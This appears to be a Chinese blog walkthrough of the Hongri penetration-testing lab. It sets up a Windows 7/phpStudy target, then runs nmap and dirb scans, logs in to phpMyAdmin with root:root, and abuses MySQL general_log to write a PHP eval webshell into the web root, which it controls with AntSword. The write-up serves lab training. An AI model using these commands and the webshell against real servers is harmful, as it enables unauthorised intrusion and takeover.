【渗透测试】-红日靶场-获取web服务器权限

拓扑图:

前置环境配置:

Win 7

默认密码:hongrisec@201

内网ip:192.168.52.143

打开虚拟网络编辑器

添加网络->VMent1->仅主机模式->子网ip:192.168.145.0

添加网卡:

虚拟机->设置-> 添加->网络适配器

保存,打开win 7并重启:

查看ip地址:

外网ip: Ip:192.168.145.129

内网ip: Ip:192.168.52.143

进入C:\phpstudy,启动

渗透测试:

方法一:phpadmin

打开kali,ip:192.168.145.128

存活主机探测

命令:nmap -sn 192.168.145.0/24

全端口扫描

命令:nmap -A -p 1-65535 192.168.145.129

80端口-> 开放 http服务

3306端口->开放 mysql服务

目录扫描

命令:dirb http://192.168.145.129

http://192.168.145.129/phpmyadmin/

登录验证:

192.168.145.129:80

泄露:

路径:C:/phpStudy/WWW

使用弱口令进行数据库连接:

root:root

http://192.168.145.129/phpmyadmin/

登录->sql。

第一步 查询日志 命令: show variables like '%general%';

发现日志写入系统关闭,需要打开。

命令: set global general_log='on';

开启成功。

在C:/phpStudy/WWW/2.php路径下写入一句话木马:

set global general_log_file = 'C:/phpStudy/WWW/2.php'

select '<?php @eval($_POST["cmd"]);?>'

验证:http://192.168.145.129/2.php

使用中国蚁剑连接成功。

拿到服务器主机权限。

相关推荐
Godspeed Zhao2 小时前
现代智能汽车中的无线技术25——Wi-Fi(13)
网络·汽车·智能路由器·信息与通信
好学且牛逼的马2 小时前
【工具配置|docker】
运维·docker·容器
Bruce_Liuxiaowei2 小时前
基于HTA的Meterpreter反向Shell攻击实验
网络·windows·经验分享·网络安全·渗透测试
文言一心3 小时前
LINUX离线升级 Python 至 3.11.9 操作手册
linux·运维·python
一三检测冯野180212918133 小时前
贴合NMPA注册 GB/T5398-2016助力医药包装运输安全
安全·模拟运输测试·包装运输测试·包装振动测试·环境试验·包装跌落测试
Dreamboat¿3 小时前
解析PHP安全漏洞:Phar反序列化、Filter链与文件包含的高级利用与防御
android·网络·php
楠目3 小时前
PHP 文件包含以及PHP伪协议
网络安全
laplace01233 小时前
第七章 构建自己的agent智能体框架
网络·人工智能·microsoft·agent
QuantumRedGuestk3 小时前
CS工具正反向渗透靶场实操解读【文图】
网络安全·内网渗透·cs·靶场渗透